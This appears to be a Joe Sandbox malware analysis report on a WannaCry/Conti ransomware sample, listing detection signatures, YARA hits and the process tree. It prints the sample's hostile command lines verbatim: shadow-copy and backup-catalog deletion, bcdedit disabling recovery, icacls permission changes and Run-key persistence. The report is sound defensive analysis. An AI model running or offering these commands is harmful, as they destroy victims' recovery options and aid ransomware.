Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WannaCry.cmd

Overview

General Information

Sample Name:WannaCry.cmd
Analysis ID:866427
MD5:8da35604db8350a0bbb7ac41e0609bb3
SHA1:6160e62c45e1fe8028da7aa8b9f5c1a4d9bf22c3
SHA256:5badd8294b5ab8aebdaef9cef14176ceb4765f170414042e828903e092d93686
Infos:

Detection

Wannacry, Conti
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Conti ransomware
Multi AV Scanner detection for submitted file
Detected Wannacry Ransomware
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Sigma detected: Delete shadow copy via WMIC
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Installs TOR (Internet Anonymizer)
Creates files in the recycle bin to hide itself
Found Tor onion address
Command shell drops VBS files
Uses bcdedit to modify the Windows boot settings
Drops PE files to the document folder of the user
Modifies existing user documents (likely ransomware behavior)
Contains functionality to modify clipboard data
Opens the same file many times (likely Sandbox evasion)
Writes many files with high entropy
Contains functionalty to change the wallpaper
Machine Learning detection for dropped file
May use the Tor software to hide its network traffic
Deletes shadow drive data (may be related to ransomware)
Moves itself to temp directory
Contains functionality to detect sleep reduction / modifications
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Uses cacls to modify the permissions of files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Uses reg.exe to modify the Windows registry
Found evaded block containing many API calls
PE file contains more sections than normal
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64native
  • cmd.exe (PID: 7300 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\WannaCry.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • msg.exe (PID: 1268 cmdline: msg * Has Sido Hackeado! MD5: B42553599E40029366A0FD8F81079BED)
    • certutil.exe (PID: 4112 cmdline: certutil -decode "WANNACRY.bin" "WannaCrypt0r.sk" MD5: BD8D9943A9B1DEF98EB83E0FA48796C2)
    • WannaCrypt0r.sk (PID: 1300 cmdline: WannaCrypt0r.sk MD5: 84C82835A5D21BBCF75A61706D8AB549)
      • attrib.exe (PID: 1704 cmdline: attrib +h . MD5: 0E938DD280E83B1596EC6AA48729C2B0)
        • conhost.exe (PID: 1580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • icacls.exe (PID: 7224 cmdline: icacls . /grant Everyone:F /T /C /Q MD5: 2E49585E4E08565F52090B144062F97E)
        • conhost.exe (PID: 868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • taskdl.exe (PID: 7432 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • cmd.exe (PID: 6932 cmdline: C:\Windows\system32\cmd.exe /c 198851684139341.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • cscript.exe (PID: 7964 cmdline: cscript.exe //nologo m.vbs MD5: 13783FF4A2B614D7FBD58F5EEBDEDEF6)
      • taskdl.exe (PID: 5740 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskdl.exe (PID: 5136 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskdl.exe (PID: 6000 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskdl.exe (PID: 8620 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • @WanaDecryptor@.exe (PID: 2380 cmdline: @WanaDecryptor@.exe co MD5: 7BF2B57F2A205768755C07F238FB32CC)
        • taskhsvc.exe (PID: 4232 cmdline: TaskData\Tor\taskhsvc.exe MD5: FE7EB54691AD6E6AF77F8A9A0B6DE26D)
          • conhost.exe (PID: 9092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 2144 cmdline: cmd.exe /c start /b @WanaDecryptor@.exe vs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • @WanaDecryptor@.exe (PID: 6116 cmdline: @WanaDecryptor@.exe vs MD5: 7BF2B57F2A205768755C07F238FB32CC)
          • cmd.exe (PID: 8692 cmdline: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 9116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
            • WMIC.exe (PID: 832 cmdline: wmic shadowcopy delete MD5: 82BB8430531876FBF5266E53460A393E)
      • WmiPrvSE.exe (PID: 9112 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 64ACA4F48771A5BA50CD50F2410632AD)
      • taskse.exe (PID: 4028 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
      • @WanaDecryptor@.exe (PID: 7668 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • cmd.exe (PID: 4512 cmdline: cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 4792 cmdline: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • taskdl.exe (PID: 7684 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskse.exe (PID: 5552 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
      • @WanaDecryptor@.exe (PID: 5596 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • taskdl.exe (PID: 6776 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskse.exe (PID: 7608 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
      • @WanaDecryptor@.exe (PID: 3056 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • taskdl.exe (PID: 2572 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskse.exe (PID: 2012 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
      • @WanaDecryptor@.exe (PID: 3492 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
      • taskdl.exe (PID: 3996 cmdline: taskdl.exe MD5: 4FEF5E34143E646DBF9907C4374276F5)
      • taskse.exe (PID: 3028 cmdline: taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe MD5: 8495400F199AC77853C53B5A3F278F3E)
      • @WanaDecryptor@.exe (PID: 8548 cmdline: @WanaDecryptor@.exe MD5: 7BF2B57F2A205768755C07F238FB32CC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
WannaCryptor, WannaCry, WannaCrypt
  • Lazarus Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor
NameDescriptionAttributionBlogpost URLsLink
Conti, Conti LockConti is an extremely damaging ransomware due to the speed with which it encrypts data and spreads to other systems. It was first observed in 2020 and it is thought to be led by a Russia-based cybercrime group that goes under the Wizard Spider pseudonym. In early May 2022, the US government announced a reward of up to $10 million for information on the Conti ransomware gang.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.conti

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth (Nextron Systems)
  • 0x2c0:$s1: A: Don't worry about decryption.
  • 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth (Nextron Systems)
  • 0x2c0:$s1: A: Don't worry about decryption.
  • 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth (Nextron Systems)
  • 0x2c0:$s1: A: Don't worry about decryption.
  • 0x0:$s2: Q: What's wrong with my files?
C:\@Please_Read_Me@.txtWannaCry_RansomNoteDetects WannaCry Ransomware NoteFlorian Roth (Nextron Systems)
  • 0x2c0:$s1: A: Don't worry about decryption.
  • 0x0:$s2: Q: What's wrong with my files?
C:\Users\user\Desktop\WANNACRY.binSUSP_certificate_payloadDetects payloads that pretend to be certificatesDidier Stevens, Florian Roth
  • 0x0:$re1: -----BEGIN CERTIFICATE-----
Click to see the 45 entries

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
    00000034.00000002.5732242026.000000000041F000.00000008.00000001.01000000.00000009.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
      00000019.00000000.4343624168.000000000041F000.00000008.00000001.01000000.00000009.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
        00000031.00000000.5428511190.000000000041F000.00000008.00000001.01000000.00000009.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
          00000004.00000003.2985145893.000001846EFA7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
            Click to see the 23 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            25.0.@WanaDecryptor@.exe.400000.0.unpackJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
              25.0.@WanaDecryptor@.exe.400000.0.unpackWin32_Ransomware_WannaCryunknownReversingLabs
              • 0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2
              • 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ...
              • 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
              37.0.@WanaDecryptor@.exe.400000.0.unpackJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
                37.0.@WanaDecryptor@.exe.400000.0.unpackWin32_Ransomware_WannaCryunknownReversingLabs
                • 0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2
                • 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ...
                • 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
                43.2.@WanaDecryptor@.exe.400000.0.unpackJoeSecurity_WannacryYara detected Wannacry ransomwareJoe Security
                  Click to see the 27 entries

                  Sigma Signatures

                  Operating System Destruction

                  barindex
                  Sigma detected: Delete shadow copy via WMIC
                  Source: Process startedAuthor: Joe Security: Data: Command: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: @WanaDecryptor@.exe vs, ParentImage: C:\Users\user\Desktop\@WanaDecryptor@.exe, ParentProcessId: 6116, ParentProcessName: @WanaDecryptor@.exe, ProcessCommandLine: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ProcessId: 8692, ProcessName: cmd.exe

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: WannaCry.cmdVirustotal: Detection: 25%Perma Link
                  Antivirus detection for dropped file
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\ProgramData\Intel\GCC\@WanaDecryptor@.exe.lnkAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: TR/FileCoder.724645
                  Source: C:\@WanaDecryptor@.exeAvira: detection malicious, Label: LNK/Runner.VPDJ
                  Multi AV Scanner detection for dropped file
                  Source: C:\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\user\AppData\Local\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skReversingLabs: Detection: 94%
                  Source: C:\Users\user\Desktop\taskdl.exeReversingLabs: Detection: 89%
                  Source: C:\Users\user\Desktop\taskse.exeReversingLabs: Detection: 89%
                  Source: C:\Users\user\Desktop\u.wnryReversingLabs: Detection: 96%
                  Source: C:\Users\user\Documents\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\user\Downloads\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\Default\Desktop\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Source: C:\Users\Public\Desktop\@WanaDecryptor@.exeReversingLabs: Detection: 96%
                  Machine Learning detection for dropped file
                  Source: C:\@WanaDecryptor@.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,25_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,25_2_00404AF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004046F0 CryptImportKey,25_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004046B0 CryptAcquireContextA,25_2_004046B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,25_2_00404770
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,25_2_004047C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,28_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,28_2_00404AF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,28_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004046F0 CryptImportKey,28_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004046B0 CryptAcquireContextA,28_2_004046B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,28_2_00404770
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,28_2_004047C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,37_2_004049B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,37_2_00404AF0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,37_2_00404B70
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004046F0 CryptImportKey,37_2_004046F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004046B0 CryptAcquireContextA,37_2_004046B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,37_2_00404770
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,37_2_004047C0
                  Source: taskhsvc.exe, 0000001D.00000003.4995126218.000000000370F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN RSA PUBLIC KEY-----
                  Source: unknownHTTPS traffic detected: 163.172.53.201:443 -> 192.168.11.20:49840 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 163.172.53.201:443 -> 192.168.11.20:49865 version: TLS 1.2
                  Source: Binary string: tC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbileson Data\Appl source: WannaCrypt0r.sk, 00000005.00000003.3701556589.000000000374D000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3741172069.000000000374E000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3699237993.0000000003743000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: DC:\Users\All Users\Application Data\Application Data\SoftwareDistributionoudStore8bbwed.pdb8bbw source: WannaCrypt0r.sk, 00000005.00000003.3698905000.0000000002594000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3742479647.0000000002599000.00000004.00000020.00020000.00000000.sdmp, WannaCrypt0r.sk, 00000005.00000003.3697563659.0000000002545000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\taskdl.exeCode function: 10_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,10_2_00401080
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,25_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,25_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,25_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,28_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,28_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,28_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,37_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,37_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,37_2_004026B0
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDE034.tmpJump to behavior
